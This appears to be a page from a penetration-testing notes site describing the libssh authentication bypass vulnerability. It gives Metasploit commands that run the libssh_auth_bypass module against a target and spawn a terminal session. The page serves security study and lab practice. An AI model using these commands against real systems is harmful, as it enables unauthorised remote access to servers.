Skip to content

AMRAP Security

libssh

AMRAP Security

Home
📱 Mobile Security
📱 Mobile Security
- Android
  Android
  - Frida Scripts
    Frida Scripts
    
    Overview
    
    Cryptography
    Cryptography
    
    Cryptography
    
    Random
    
    Data Storage
    Data Storage
    
    Log
    
    Print Stream
    
    Shared Preferences
    
    SQLite Database
    
    TextView
    
    Network
    Network
    
    HTTP Connection
    
    Read/Write Data
    
    SSL Pinning
    
    Platform Interaction
    Platform Interaction
    
    Permissions
  - Uncrackable L1
🕸️ Web Applications Security
🕸️ Web Applications Security
- Introduction
- Client Side Attacks
  Client Side Attacks
- Content Management Systems (CMS)
  Content Management Systems (CMS)
  - Introduction
  - WordPress
- Injection Attacks
  Injection Attacks
  - SQL Injection
- Tools
🌐 Network Security
🌐 Network Security
- Network Fundamentals
- Services And Protocols
  Services And Protocols
  - FTP
  - HTTP
  - MySQL
  - PostgreSQL
  - RDP
  - Rejetto HFS
  - SMB
  - SMTP
  - SNMP
  - SSH
  - WebDAV
  - WinRM
- Active Directory
- Information Gathering
  Information Gathering
- Exploitation
  Exploitation
  - Introduction
  - Remote Shells
  - Linux
    Linux
    
    Haraka
    
    libssh libssh
    Table of contents
    
    Exploitation with Metasploit
    
    PHP CGI
    
    Samba
    
    Shellshock
    
    Tomcat
    
    vsftpd
- Windows
  Windows
- Post Exploitation
  Post Exploitation
  - Pivoting
  - Linux
    Linux
    
    Enumeration
    
    Privilege Escalation
    
    Persistence
    
    Hash Dumping
    
    Clearing Tracks
  - Windows
    Windows
    
    Overview
    
    Enumeration
    
    Privilege Escalation
    
    Persistence
    
    Hash Dumping
    
    Clearing Tracks
- Tools
  Tools
  - CrackMapExec
  - Empire
  - Metasploit
  - Mimikatz
  - Msfvenom
  - Nessus
  - Netcat
  - Nmap
  - Searchsploit
  - Socat
  - WMAP
⚡ Cheatsheets
⚡ Cheatsheets
- Network Security
- Web App Security

libssh

It is a multiplatform C library implementing the SSHv2 protocol on client and server side.

lib v0.60-0.80. is vulnerable to an authentication bypass vulnerability in the libssh server code that can be exploited to execute commands on the target server.

Exploitation with Metasploit

use auxiliary/scanner/ssh/libssh_auth_bypass

set RHOSTS TARGET_IP

# Spawn a TTY session after running the module
set SPAWN_PTY true

run